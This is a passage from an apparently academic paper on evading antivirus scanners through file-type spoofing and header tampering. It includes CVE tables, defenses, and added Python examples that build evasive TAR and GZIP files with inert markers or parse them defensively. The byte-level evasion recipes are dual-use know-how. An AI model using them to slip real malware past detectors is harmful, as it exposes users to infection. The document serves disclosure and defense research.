  POSIX TAR         CHM             4                      2012-1422
  POSIX TAR         PE              11                     2012-1423
  POSIX TAR         SIS             6                      2012-1424
  POSIX TAR         PKZIP           16                     2012-1425
  POSIX TAR         BZip2           6                      2012-1426
  POSIX TAR         WinZip          3                      2012-1427
  POSIX TAR         JPEG            3                      2012-1428

Table VII. CHAMELEON ATTACKS WITH BLISS-INFECTED ELF FILES.

  Actual file type  Fake file type  No. of vulnerable AVs  CVE
  ELF               POSIX TAR       9                      2012-1429
  ELF               SIS             9                      2012-1430
  ELF               JPEG            10                     2012-1431

Table VIII. CHAMELEON ATTACKS WITH CECILE-INFECTED PE FILES.

  Actual file type  Fake file type  No. of vulnerable AVs  CVE
  PE                WinZip          4                      2012-1432
  PE                JPEG            5                      2012-1433
  PE                SIS             4                      2012-1434
  PE                PKLITE          5                      2012-1435
  PE                LZH             5                      2012-1436

Table IX. CHAMELEON ATTACKS FOR ABC-INFECTED MS OFFICE 97 DOC FILES.

  Actual file type  Fake file type  No. of vulnerable AVs  CVE
  MS Office         PKSFX           1                      2012-1437
  MS Office         POSIX TAR       2                      2012-1438

Results for chameleon attacks. Our description of file-type inference logic focuses on ClamAV because its open-source code makes it easy to explain the heuristics. File-type inference based on magic strings is by no means unique to ClamAV, however. All tested scanners proved vulnerable to masquerade-based chameleon attacks. The results are summarized in Table X; the masquerade pairs for each attack and scanner are shown in Tables VI, VII, VIII, and IX. In all attacks, to masquerade as a particular type we used ClamAV's magic string if supported by ClamAV, otherwise a string from Table XIV in the appendix.
Sample attack: making a TAR archive look like mirc.ini. We describe a sample exploit against ClamAV in which a POSIX TAR file masquerades as a 'mirc.ini' file. Their file-type signatures are disjoint and the signature of 'mirc.ini' is matched before the signature of TAR. It remains to ensure that adding the 'mirc.ini' signature to a TAR file does not affect the processing of the archive by the tar program. Table XIII says that the signature of 'mirc.ini' begins at offset 0 and is 9 bytes long. Thus bytes 0 through 8 of the input TAR file must be changed to 5b616c69617365735d. Because the initial 100 bytes contain the name of the first file, the first 9 bytes of this name will change as a side effect. This does not affect the archive's contents and any virus infecting any file in the archive will be free to spread.

We converted this masquerade exploit into a working chameleon attack using the test EICAR virus [11], which is detected by all antivirus scanners, including ClamAV. If the first 9 bytes of a TAR archive containing 'eicar.com' are directly changed to 5b616c69617365735d ('[aliases]' in ASCII), the tar application considers the archive corrupted because the names of all member files are part of a checksum-protected header block. To avoid this issue, it is sufficient to rename 'eicar.com' to '[aliases].com' and put it inside the TAR archive. ClamAV does not recognize the file as an archive and scans it as a "blob," looking for the EICAR signature only at offset 0 and failing to detect it in the middle of the file. Another approach is to use a TAR manipulation library to change the checksum, but this is not necessary here because the fake file-type signature '[aliases]' only contains ASCII characters.
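The two variants of this attack, built in memory with Python's standard `tarfile` module, as an added example that is not part of the paper. The member payload is a constructed inert marker standing in for the EICAR test string; nothing here is malware. `patch_first_bytes` is the naive variant (overwrite bytes 0..8 in place), which breaks the ustar header checksum; `build_renamed_archive` is the working variant (name the member `[aliases].com`), which yields a valid archive whose first 9 bytes are the mirc.ini magic while the `ustar` magic at offset 257 is untouched. `tar_extracts` models the end-host tar program with `tarfile`, and `blob_scan_at_offset_zero` models a confused scanner that checks for the payload only at offset 0 after failing to recognize the archive.

```python
"""TAR-as-mirc.ini chameleon file, two ways (added example)."""
import io
import tarfile

PAYLOAD = b"TEST-PAYLOAD-STANDING-IN-FOR-EICAR"   # constructed, inert marker
FAKE_MAGIC = b"[aliases]"                          # mirc.ini magic from the text


def build_archive(member_name, payload=PAYLOAD):
    """One-member POSIX (ustar) TAR archive built in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(member_name)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def ustar_checksum_ok(header):
    """Recompute the ustar header checksum: the sum of all 512 header bytes
    with the 8-byte chksum field (offset 148) counted as ASCII spaces."""
    stored = int(header[148:156].strip(b"\0 ").decode(), 8)
    computed = sum(header[:148]) + 8 * 0x20 + sum(header[156:512])
    return stored == computed


def patch_first_bytes(archive):
    """Naive masquerade: overwrite bytes 0..8 of the first header in place."""
    return FAKE_MAGIC + archive[len(FAKE_MAGIC):]


def build_renamed_archive():
    """Checksum-preserving masquerade: name the member after the magic."""
    return build_archive("[aliases].com")


def tar_extracts(archive):
    """(name, data) of the first member if tar accepts the archive, else None.
    Models the end-host tar program with the tarfile module."""
    try:
        with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
            member = tf.next()
            return member.name, tf.extractfile(member).read()
    except tarfile.TarError:
        return None


def blob_scan_at_offset_zero(data):
    """Fixed-offset blob check, as a scanner that missed the archive does."""
    return data.startswith(PAYLOAD)


def payload_offset(data):
    """Where the member data really sits (after the 512-byte header)."""
    return data.find(PAYLOAD)


if __name__ == "__main__":
    good = build_archive("eicar.com")
    bad = patch_first_bytes(good)
    renamed = build_renamed_archive()
    print("patched in place: checksum ok =", ustar_checksum_ok(bad[:512]),
          "tar extracts =", tar_extracts(bad))
    print("renamed member:   checksum ok =", ustar_checksum_ok(renamed[:512]),
          "tar extracts =", tar_extracts(renamed))
    print("magic at 0:", renamed[:9], "payload at offset", payload_offset(renamed),
          "blob scan at 0 finds it:", blob_scan_at_offset_zero(renamed))
```

The in-place patch changes the byte sum of the header (the name "eicar.com" and "[aliases]" do not sum to the same value), so tar rejects it; the rename produces the same first 9 bytes with a checksum computed by the archiver itself, which is why no checksum fix-up is needed.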
Sample attack: user-repaired archive. The application on the end host is often capable of repairing the modified file (this is common in archiving programs). In some cases, it may prompt the user whether she wants to repair the file. Most users answer 'Yes' to these questions. Given a RAR archive with an EICAR-infected file, we changed the first two bytes to "MZ," which is the magic identifier for Windows executables. None of the tested scanners detected the infection in the modified archive, yet the RAR program on the end host repaired it and correctly extracted the infected file. This is especially surprising because this particular attack is anecdotally known [2].

Table X. SUCCESSFUL CHAMELEON ATTACKS.

  Format type  File format   No. of attacks  CVE
  non-archive  ELF           3               2012-1429, 2012-1430, 2012-1431
  non-archive  PE            5               2012-1432, 2012-1433, 2012-1434, 2012-1435, 2012-1436
  non-archive  MS Office 97  2               2012-1437, 2012-1438
  archive      TAR           10              2012-1419, 2012-1420, 2012-1421, 2012-1422, 2012-1423, 2012-1424, 2012-1425, 2012-1426, 2012-1427, 2012-1428
  archive      RAR           1               2012-1443
Sample attack: exploiting regex-based file-type inference. To recognize certain formats, ClamAV uses regular expressions to match magic strings that can occur anywhere in a file, in addition to looking for magic strings at fixed offsets. We describe two sample attacks on this combination of fixed-offset and regex-based inference (tested against ClamAV only and thus not counted in Table X).

ZIP archives may start with arbitrary bytes. To recognize ZIP files, ClamAV uses both a fixed-offset signature 504b0304 at offset 0 and a regex signature 504b0304 which can appear at any offset within the input file. Once a format has been recognized according to the fixed-offset signature, ClamAV does not do any further inference, even if there are regex matches inside the file. To exploit this, we created a ZIP file containing a Cassini-infected executable and prepended the four bytes 50 4b 03 04 to it. ClamAV matched the fixed-offset signature at offset 0 but failed to notice the regex signature at offset 4, was thus unable to extract the contents correctly, and declared the archive clean. The destination application (unzip) ignored the initial bytes and extracted the infected file.

The second attack exploits the fact that ClamAV ignores files of certain types (e.g., MPEG video and Ogg Vorbis audio) because they are not affected by any major viruses. We created a CAB archive containing a Cassini-infected file and prepended the four bytes 00 00 01 b3 to it, which is the fixed-offset MPEG signature. ClamAV's file-type database contains a regex signature for the CAB format (4d534346 anywhere in the file, which matches CAB files even with garbage prepended), but ClamAV does not apply regex signatures once the fixed-offset signature has been matched. Therefore, ClamAV infers MPEG type for the file and does not scan it, while the destination application (cabextract) correctly extracts the infected file.
VI. WEREWOLF ATTACKS

Werewolf attacks tamper with the file's meta-data, causing the detector to parse it incorrectly and/or incompletely. In contrast, the OS or application on the end host usually "understands" the format much deeper (see Section VIII-A) and processes the file correctly.

Table XI shows that every scanner we tested is vulnerable to multiple file-parsing attacks. Table XII summarizes the header-parsing discrepancies found by our differential fuzzing framework. All of them result in successful werewolf attacks; the rest were found by manual analysis. Below, we explain some of the attacks, using ClamAV as an example of an open-source detector and McAfee as an example of a closed-source detector.

Table XI. SUCCESSFUL WEREWOLF ATTACKS.

Format type   File format   No. of vulnerable AVs   CVE
non-archive   ELF           12                      2012-1463
non-archive   CHM           2                       2012-1458
archive       ZIP           20                      2012-1456
archive       TAR           29                      2012-1457
archive       TAR           35                      2012-1459
archive       TGZ           8                       2012-1460
archive       TGZ           20                      2012-1461
archive       ZIP           12                      2012-1462

Table XII. HEADER-PARSING ERRORS (ALL RESULT IN WEREWOLF ATTACKS).

Format type   Format   Header fields            No. of vuln. AVs   CVE
non-archive   ELF      padding                  4                  2012-1439
non-archive   ELF      identsize                5                  2012-1440
non-archive   ELF      class                    11                 2012-1442
non-archive   ELF      abiversion               4                  2012-1444
non-archive   ELF      abi                      4                  2012-1445
non-archive   ELF      encoding                 14                 2012-1446
non-archive   ELF      eversion                 4                  2012-1447
non-archive   ELF      eiversion                6                  2012-1454
non-archive   PE       e_minalloc + 13 others   2                  2012-1441
non-archive   PE       e_ip and e_res           1                  2012-1441
archive       CAB      cbCabinet                5                  2012-1448
archive       CAB      vMajor                   2                  2012-1449
archive       CAB      reserved3                3                  2012-1450
archive       CAB      reserved2                2                  2012-1451
archive       CAB      reserved1                3                  2012-1452
archive       CAB      coffFiles                14                 2012-1453
archive       CAB      vMinor                   2                  2012-1455

A. Sample werewolf attacks on archive files

Wrong checksum. In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. All headers also contain a file length field, which is used by the extractor to locate the next header in the archive. Most scanners do not use the checksum field when parsing an archive. This is reasonable because a virus may lurk even in an archive whose checksum is wrong, but in this case the scanners are too smart for their own good. Our sample attack uses a TAR archive with two files: the first one is clean, while the second is infected with the test EICAR virus. The length field in the header of the first, clean file has been modified to point into the middle of the header of the second, infected file (see Figure 2). Scanners that do not verify the checksum field are unable to find the beginning of the second header. 35 of the 36 tested scanners fail to detect the infection in the modified archive (the only exception is eSafe 7.0.17.0). In contrast, tar on Linux discovers that the checksum is invalid, prints out a warning, skips the first header, finds the second, infected file by searching for the magic string "ustar," and proceeds to extract it correctly.

Figure 2. A crafted TAR archive with the modified length field in the first header. [Figure: a regular TAR archive (header 1 with benign chksum and length, file 1, header 2, file 2) shown beside the crafted TAR archive (header 1 with corrupt chksum and modified length, file 1, header 2, file 2 (infected)).]
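The discrepancy in the wrong-checksum attack is easy to see in a few lines of parser code. The following is an added example, not code from the paper or from any of the scanners it tests: it builds a two-member ustar archive in memory (the second member carries a constructed marker string standing in for the infected file), rewrites the first header's length field without touching its chksum, the way the paragraph describes, and then contrasts a scanner-style walk that trusts the length field with one that verifies chksum and, on a mismatch, resynchronises on the "ustar" magic as GNU tar does. The member names, the marker and the chosen length (768) are all constructed values.

```python
import io
import tarfile

BLOCK = 512
# Constructed stand-in for the infected member's content (not a real test file).
MARKER = b"CONSTRUCTED-INFECTED-MARKER"


def build_archive():
    """Two-member POSIX (ustar) archive built in memory: a clean file, then the marker."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in (("clean.txt", b"hello\n"), ("second.txt", MARKER)):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _octal(field):
    """Decode a NUL/space-terminated octal header field (size, chksum, ...)."""
    digits = field.split(b"\0", 1)[0].strip()
    return int(digits, 8) if digits else 0


def header_chksum(hdr):
    """POSIX chksum: sum of all header bytes with the chksum field read as 8 spaces."""
    return sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:])


def craft_misleading_length(archive, new_size=768):
    """Rewrite only the first header's size field, leaving its chksum stale.
    The trusting walk below then lands inside the second member instead of on
    its header. new_size=768 is a constructed value."""
    hdr = bytearray(archive[:BLOCK])
    hdr[124:136] = b"%011o\0" % new_size
    return bytes(hdr) + archive[BLOCK:]


def _next_offset(off, size):
    """Offset of the next header: this header plus the data rounded up to blocks."""
    return off + BLOCK + ((size + BLOCK - 1) // BLOCK) * BLOCK


def walk_trusting(archive):
    """Scanner-style walk: trusts the size field, never checks chksum, and stops at
    the first block that is neither a ustar header nor the end-of-archive marker."""
    names, off = [], 0
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK or hdr[257:262] != b"ustar":
            break
        names.append(hdr[:100].split(b"\0", 1)[0].decode())
        off = _next_offset(off, _octal(hdr[124:136]))
    return names


def walk_verifying(archive):
    """Verifies chksum; on a bad header, skips one block and resyncs on 'ustar'.
    Returns (member names, tampered flag) so a detector can act on the flag."""
    names, tampered, off = [], False, 0
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:
            break
        if hdr[257:262] != b"ustar" or _octal(hdr[148:156]) != header_chksum(hdr):
            tampered = True
            off += BLOCK
            continue
        names.append(hdr[:100].split(b"\0", 1)[0].decode())
        off = _next_offset(off, _octal(hdr[124:136]))
    return names, tampered


if __name__ == "__main__":
    crafted = craft_misleading_length(build_archive())
    print("trusting walk :", walk_trusting(crafted))   # only the clean member
    print("verifying walk:", walk_verifying(crafted))  # the hidden member, flagged
```

On the crafted archive the trusting walk lists only clean.txt, because its computed next-header offset falls on the second member's data rather than its header; the verifying walk reports the stale checksum, skips forward block by block until it finds a header whose chksum matches, and reaches the marker member. A detector that at least flags the checksum mismatch, even without resynchronising, would not declare this archive clean.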
Misleading length. If the length field in the header of a file included into a TAR archive is greater than the archive's total length (1,000,000 + original length in our experiments), 29 out of 36 scanners fail to detect the infection. One of the vulnerable scanners is McAfee, which has the default upper limit of 1 MB on memory for loading a file. Since the size specified in the header is greater than 1 MB, McAfee declares the file clean. GNU tar prints a warning but extracts the infected contents correctly.

Multiple streams. GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. This feature can be used to craft a .tar.gz file with the EICAR test virus broken into two parts. 20 out of 36 scanners fail to detect the infection. When the contents are extracted, the infected file is correctly reassembled. For example, McAfee simply ignores all bytes after the first stream of compressed data. Even if another infected file is appended to a GZIP file containing multiple compressed streams, McAfee fails to detect the infection.

Random garbage. If a ZIP archive has garbage bytes in the beginning, the unzip program skips these bytes and still extracts the contents correctly (we used Zip 3.0 and UnZip 6.00 in Ubuntu 10.04 for this test). 12 out of 36 scanners fail to detect the infection in a file consisting of 1024 bytes of random garbage followed by an EICAR-infected ZIP file. Note that the file still has the proper .zip extension. Random garbage at the end of a valid GZIP archive does not affect the gzip program, which simply ignores it when extracting the contents. Yet, given an EICAR-infected .tar.gz file with 6 random bytes appended, 8 out of 36 scanners fail to detect the infection.
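Both GZIP discrepancies above (a payload split across concatenated streams, and bytes trailing the last valid stream) come down to whether the detector walks every member and accounts for what follows the last one. The following member walker is an added example, not code from the paper or from any scanner it tests; it is built on zlib's decompressobj, which stops at the end of each gzip member and hands back the remaining bytes. The marker string (split across two streams so that neither contains it whole) and the trailing bytes are constructed inputs.

```python
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b"
# Constructed marker standing in for the test virus; it is split across two
# compressed streams below so that neither stream contains it whole.
MARKER = b"CONSTRUCTED-EVASION-MARKER"


def build_multistream(trailing=b""):
    """Two independently gzipped streams back to back (valid per RFC 1952 and
    reassembled by gzip/tar), optionally followed by constructed trailing bytes."""
    cut = len(MARKER) // 2
    first = gzip.compress(b"padding " + MARKER[:cut])
    second = gzip.compress(MARKER[cut:] + b" more padding\n")
    return first + second + trailing


def walk_members(blob):
    """Decompress every gzip member in turn.
    Returns (list of member payloads, bytes left over after the last member)."""
    payloads, rest = [], blob
    while rest.startswith(GZIP_MAGIC):
        d = zlib.decompressobj(wbits=31)   # 31 = gzip wrapper with a 32 KiB window
        out = d.decompress(rest)
        if not d.eof:                      # data ran out before the member's trailer
            raise ValueError("truncated gzip member")
        payloads.append(out)
        rest = d.unused_data               # whatever follows this member's trailer
    return payloads, rest


def scan(blob, needle=MARKER):
    """Detector view: search the reassembled content (what the extractor produces),
    compare with a first-stream-only search, and count unaccounted trailing bytes."""
    payloads, trailing = walk_members(blob)
    return {
        "members": len(payloads),
        "found_in_first": needle in payloads[0],
        "found_reassembled": needle in b"".join(payloads),
        "trailing_bytes": len(trailing),
    }


if __name__ == "__main__":
    print(scan(build_multistream(trailing=b"\x00\xffjunk")))
```

A scanner that stops after the first stream sees found_in_first == False and declares the file clean; walking every member yields found_reassembled == True, and trailing_bytes > 0 is exactly the "random garbage at the end" case, which the walker surfaces instead of silently ignoring.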
Ambiguous files conforming to multiple formats. Flexibility of many file formats enables an attacker to create werewolf files that can be correctly parsed according to more than one format and produce different results. Given that zip correctly parses ZIP archives with garbage prepended, while tar correctly parses TAR archives with garbage appended, we created a werewolf file consisting of a TAR archive followed by a virus-infected ZIP archive. This file can be processed either by tar or by zip, and different contents will be extracted depending on which program is used. 20 out of 36 scanners fail to detect the infection. Other werewolf files that can be parsed according to multiple formats are CAB-TAR, ELF-ZIP, and PE-CAB. Some of these pairs include non-archive formats!
B. Sample werewolf attacks on non-archive files

Werewolf attacks are also effective against executables, Office documents, and CHM files. Many modern file formats are similar to archives because they can contain embedded objects of different types. This makes parsing much harder and opens the door to werewolf attacks.

Fake endianness. In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for big-endian. The Linux kernel, however, does not check this field before loading an ELF file. If the 5th byte of a Bliss-infected, little-endian ELF file is changed to 02, 12 out of 36 scanners fail to detect the infection.

Empty VBA project names. MS Word files may contain embedded objects such as executable macros, images, etc. Because viruses can exploit the auto-execution feature, detectors try to recognize and scan macros in the document. In this example, we focus on how ClamAV does this. In MS documents, macros are generally stored inside VBA (Visual Basic for Applications) projects. A group of VBA projects is identified by a two-byte signature, "cc61"; each project in a group has a unique Unicode name. ClamAV first iterates through the VBA project names treating the data as little-endian and checks if the resulting names are valid (have positive length and begin with "*\g", "*\h", "*\", or "*\d"). If an invalid name is found, ClamAV stops. ClamAV stores the number of valid project names it found in the first pass and repeats the same process, but now assuming that the data are big-endian. Finally, ClamAV compares the number of strings found during the two passes. If the first number is greater than the second, ClamAV treats the file as little-endian, otherwise, as big-endian. We created an ABC-infected Word file in which the first VBA project name is empty but the other names are intact. When parsing project names, ClamAV calculated the valid name count to be 0 in both little-endian and big-endian cases and failed to detect the infection. On the other hand, destination applications (MS Office 2007 and OpenOffice) open the document correctly and execute the infected macros even though the first project name is empty.

Incorrect compression reset interval. A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header. If the header is modified so that the reset interval is lower than in the original file, the target application (in this case, the Windows CHM viewer hh.exe) correctly decompresses the content located before the tampered header. On the other hand, several detectors (including ClamAV) attempt to decompress the entire CHM file before scanning it for malware. When they fail to decompress the contents located after the tampered header, they declare the file to be clean.

Bypassing section-specific signatures. ClamAV uses section-specific hash signatures when scanning Windows executables. They contain the offset and the length of a section of the file and the value of its MD5 hash. 85% of signatures in ClamAV's current database are of this type. If ClamAV's parser mistakenly believes that the executable is corrupt or contains some unsupported features, ClamAV skips the section-specific hash signatures, enabling evasion.
VII. DEFENSES AGAINST CHAMELEON ATTACKS

Simplistic solutions such as changing the order in which magic strings are matched may address the specific vulnerabilities we found but will undoubtedly introduce new ones. One generic defense against all chameleon attacks is to recognize files that match multiple types and process them for all matching types. This may open the door to denial of service if the attacker floods the detector with files containing a large number of magic strings. To prevent this, the detector should reject files with an abnormally high number of possible types, but this only works for fixed-offset magic strings. Checking whether the file matches more than a certain number of regular expressions can still impose an unacceptable overhead on the detector.
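The first defense above, reporting every type a file matches rather than the first, can be shown on ClamAV's own fixed-offset table (Appendix, Table XIII). This is an added example, not ClamAV's code or the paper's: the table entries are a subset of Table XIII with ClamAV's check order preserved, the input is a constructed buffer carrying both the mirc.ini magic at offset 0 and the POSIX TAR magic at offset 257 (the '[aliases]' chameleon the text describes), and MAX_TYPES is a constructed cap standing in for the "abnormally high number of possible types" threshold.

```python
# Subset of ClamAV's fixed-offset magic strings, (check order, offset, hex magic, type),
# taken from Appendix Table XIII of the paper.
MAGIC_TABLE = [
    (1, 0, "5b616c69617365735d", "mirc.ini"),
    (2, 257, "7573746172", "TAR-POSIX"),
    (5, 8, "19040010", "SIS"),
    (13, 0, "7f454c46", "ELF"),
    (33, 0, "52617221", "RAR"),
    (37, 0, "504b0304", "ZIP"),
    (41, 0, "4d5a", "MS-EXE"),
    (42, 0, "4d534346", "MS CAB"),
]

MAX_TYPES = 2  # constructed cap: more matching types than this is treated as suspicious


def _matches(buf, offset, magic_hex):
    magic = bytes.fromhex(magic_hex)
    return buf[offset:offset + len(magic)] == magic


def infer_first(buf):
    """First-match inference in ClamAV's check order: the heuristic chameleon
    attacks confuse, because an earlier entry shadows every later one."""
    for _, off, magic, ftype in sorted(MAGIC_TABLE):
        if _matches(buf, off, magic):
            return ftype
    return None


def infer_all(buf):
    """Defensive inference: every type whose fixed-offset magic matches, so the
    detector can parse the file under each of them."""
    return {ftype for _, off, magic, ftype in MAGIC_TABLE if _matches(buf, off, magic)}


def classify(buf):
    """Set of types to process the file as, or 'reject' when the count exceeds
    MAX_TYPES (the denial-of-service guard the paragraph describes)."""
    types = infer_all(buf)
    return "reject" if len(types) > MAX_TYPES else types


def build_chameleon():
    """Constructed input: '[aliases]' at offset 0 and 'ustar' at offset 257."""
    buf = bytearray(512)
    buf[0:9] = b"[aliases]"
    buf[257:262] = b"ustar"
    return bytes(buf)


if __name__ == "__main__":
    sample = build_chameleon()
    print("first match:", infer_first(sample))   # mirc.ini, the TAR magic is shadowed
    print("all matches:", sorted(infer_all(sample)))
```

First-match inference returns mirc.ini for the constructed buffer and the TAR magic is never considered; infer_all returns both types, so a detector built on it would still run its TAR parser over the file. The cap in classify only helps against fixed-offset magics, as the text notes: regex signatures that may match anywhere cannot be counted this cheaply.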
Another approach is normalization: the detector can modify the file to ensure that the end host's interpretation of its type matches the detector's. In Windows, the file extension determines by default which program is used to open it. In Linux, desktop managers such as KDE and GNOME use extensions as the first heuristic and fall back on magic strings if the file has an unknown extension or no extension at all. Unfortunately, rewriting the extension is not a failproof defense against chameleon attacks because it does not guarantee that the end host's behavior matches the detector's expectations. First, users may override the default settings in both Windows and Linux and choose any program to open any file. Second, for end hosts running Linux, the detector must be aware of the list of known extensions: if the normalized extension is not on the list, chameleon attacks may still succeed even with the default settings.
VIII. NETWORK-BASED DEFENSES AGAINST WEREWOLF ATTACKS

No matter what technique a network-based detector is using (scanning for virus signatures, emulated execution, behavioral analysis, etc.), it must first recognize the type of the file and parse it correctly. Even behavioral detection does not help if the detector is unable to find executable code in a maliciously crafted file and thus cannot execute it. Because network-based detectors do not observe the actual processing and/or execution of the file on the end host, they must guess how the end host may process the file. If a network-based detector is protecting multiple end hosts, it must guess correctly for all of them. In the rest of this section, we argue that this is extremely error-prone.

A. "Write a better parser"

The obvious defense against werewolf attacks is to ensure that the malware detector parses each file exactly the same way as the file's destination application or OS, thus eliminating the "semantic gap." Note, however, that detectors deployed on mail servers, network gateways, as a cloud-based service, etc. aim to benefit from economies of scale and typically protect many hosts with a diverse set of applications installed on them. To prevent werewolf attacks, the malware detector must parse each file in multiple ways, one for every possible destination application and OS. The detector must (1) know all applications that may possibly be used on any of the end hosts to access the file, (2) know every application's parsing logic, (3) precisely replicate this logic within the detector for all possible inputs, including damaged and non-compliant files, (4) replicate every known and unknown bug in every application's parsing algorithm, and (5) be promptly updated with a new algorithm whenever an application is installed or updated on any end host.

Format-compliant parsing is not enough. Format specifications prescribe how to parse correctly formatted files. In practice, however, many files do not fully conform to the specification, thus (1) applications are designed to handle even non-compliant files, and (2) blocking "malformed" files is likely to render the detector unusable because of false positives. Many formats do not define what it means for a file to be "well-formed," causing files created by legitimate applications to appear malformed. For example, up to 68% of PE executable images in the wild have structural anomalies and do not conform to the PE format specification [29]. Formats like PDF have no universally recognized notion of validity and even conformance benchmarks accept malformed and corrupt files [14]. Furthermore, every application parses non-compliant files in its own idiosyncratic way, resulting in different outputs for the same input (see Fig. 3).
Figure 3. Parsing discrepancies. [Figure: for applications A_1, A_2, A_3, the set of inputs from which the i-th application A_i produces valid output, drawn against the set of format-compliant inputs.]

Let $I$ be the set of all possible file inputs, $O$ the set of possible outputs, and $S_f : I_S \to O_S$ the specification for format $f$, where $I_S \subseteq I$ and $O_S \subseteq O$. An ideal program $P_{ideal}$ would only produce an output for compliant inputs:

$$P_{ideal}(x) = \begin{cases} S_f(x) & \text{if } x \in I_S \\ \text{Error} & \text{if } x \in I \setminus I_S \end{cases}$$

In practice, however, applications have to deal with non-compliant inputs that lie in $I \setminus I_S$. Any real program $P_{real}$ has its idiosyncratic way $S_d$ of parsing non-compliant files:

$$P_{real}(x) = \begin{cases} S_f(x) & \text{if } x \in I_S \\ S_d(x) & \text{if } x \in I_d, \text{ where } S_d : I_d \to O_S \\ \text{Error} & \text{if } x \in I \setminus (I_S \cup I_d) \end{cases}$$

Suppose there are $n$ programs $P_1, P_2, \ldots, P_n$ for processing format $f$. The detector $AV$ does not know which of them will be used on the end host and must produce:

$$AV(x) = \begin{cases} S_f(x) & \text{if } x \in I_S \\ S_{d_1}(x) \cdots S_{d_n}(x) & \text{if } x \in I_{d_1} \cup \ldots \cup I_{d_n} \\ \text{Error} & \text{if } x \in I \setminus (I_S \cup I_{d_1} \cup \ldots \cup I_{d_n}) \end{cases}$$

Building such a parser is very difficult.
For example, specifications of archive formats usually do not say what to do when some member files are damaged or malformed (e.g., have invalid checksums). Some applications extract only the valid files, others generate an error, yet others attempt to repair the damage or simply ignore the invalid checksums. Critically, many applications produce usable outputs even for the input files that are invalid according to the format specification.

Detectors do not parse in the same way as applications. First, the parsing functionality of applications is much richer than that of malware detectors. Detectors only implement the bare minimum needed to analyze a file for malware. In the above example, many detectors ignore checksums in archives because their goal is to find hidden malware code, not verify file integrity. At first glance, a parser that ignores checksums seems safe because, in theory, it should accept strictly more inputs than a parser that verifies checksums. As we show in Section VI, this is not true! Ignoring checksums introduces subtle parsing discrepancies between the parser and the application and enables werewolf attacks.

Second, applications often have bugs in their file-parsing code. The detector must replicate every known and unknown parsing bug in every application that could be used on any end host to handle the file.

Third, many format specifications are incomplete and/or nondeterministic. As a consequence, different applications make different choices and parse even the same compliant file in different ways. For example, parsing of PDF files is notoriously loose [14, 26].

Fourth, specifications of proprietary file formats are often closed-source and change with every release of the application, making it infeasible for the implementors of malware detectors to keep up.

It is hard to replicate the application's parsing logic. Even with access to the application's parser, it is difficult to write another parser that exactly replicates its behavior on all possible inputs. For example, after 12 years of bug-fixing there are still many file-parsing discrepancies between the "functionally equivalent" busybox and coreutil versions of Unix utilities [7]. 238 out of 743 compatibility bugs between OpenOffice and MS Office are caused by file processing [24] and even after a significant reverse-engineering effort, faithful replication of parsing remains a challenge [23]. In general, complete replication of the input-output behavior is infeasible for most non-trivial systems. Non-parsing examples include differences between OS implementations of the same network protocol stack (exploited by Nmap) and differences between monitored and unmonitored execution environments (exploited by split-personality malware [8]).

Same file can be parsed according to different, contradictory formats. Many file formats are flexible enough that an attacker can craft a single file which is valid according to multiple file formats and can be correctly parsed in multiple ways. For example, as mentioned in Section VI, a werewolf file consisting of a valid TAR archive followed by a valid ZIP archive can be processed either by tar or by zip and will produce different results depending on which program is used. Similar attacks are possible for other format pairs, such as ELF and ZIP or PE and CAB. The detector must determine all possible formats with which the file may be compatible, and, for each format, parse the file in all possible ways supported by all applications dealing with this format. Even if this were feasible, it is likely to impose an unacceptable performance overhead.

Detector must keep an up-to-date list of all applications on all protected end hosts. Even if the detector were capable of accurately replicating hundreds of different file-parsing algorithms, it must know which algorithms to apply. To do this, the detector must know which applications may handle the file on any of the protected end hosts at any given time, and its parsing logic must be promptly updated whenever a new version of any application is installed on any end host. In many cases (for instance, when the detector is running on a mail server) the complete set of protected applications may not even be known.
For example, one of our werewolf attacks involves a TAR archive with a single file and a malformed header specifying a significantly larger length than the actual size of the file. We tested three different Linux applications: GNU tar 1.22, 7-Zip 9.04 beta, and File Roller 2.30.1.1. 7-Zip was not able to extract the contents. GNU tar extracted the contents with an "unexpected EOF" warning. Surprisingly, File Roller, which is a GUI front-end for GNU tar, failed to extract the contents. Further examination revealed that even though GNU tar extracts correctly, it returns 2 instead of the usual 0 because it reached the end of file much earlier than it was expecting based on the length field of the header. This causes File Roller to produce an error message.

File parsing is version-dependent even in the same application. For example, GNU tar up to version 1.16 supported ustar type N header logical records, but later versions of GNU tar no longer do.

It is hard to update parsing code. Adding or modifying a file parser is not nearly as simple as adding a new virus signature. All signatures share a common format, thus a generic signature-matching engine is usually capable of handling both old and new signatures. Adding new signatures does not require any changes to the signature format or the scanning code. Parsers, on the other hand, must be implemented by hand and manually updated after any change in the parsing logic of any of the protected applications.

Normalization is no easier than parsing. Normalization (rewriting a non-compliant file so that it complies with the format specification) may help in defeating werewolf attacks. Unfortunately, it requires parsing the file first and thus faces all the problems outlined above. For example, consider normalizing an archive to remove invalid files. The detector must parse the archive to find individual files and determine their validity according to the specification of each file's format. This is extremely error-prone. Suppose that per specification, the 5th byte of the file contains the format version number. Now the detector must keep track of valid version numbers for each format, and so on. The notion of validity varies dramatically from file to file, with different parts of the header and content used for this purpose in different formats. This makes normalization infeasible for all but the simplest formats.
B. Do not parse files in the detector

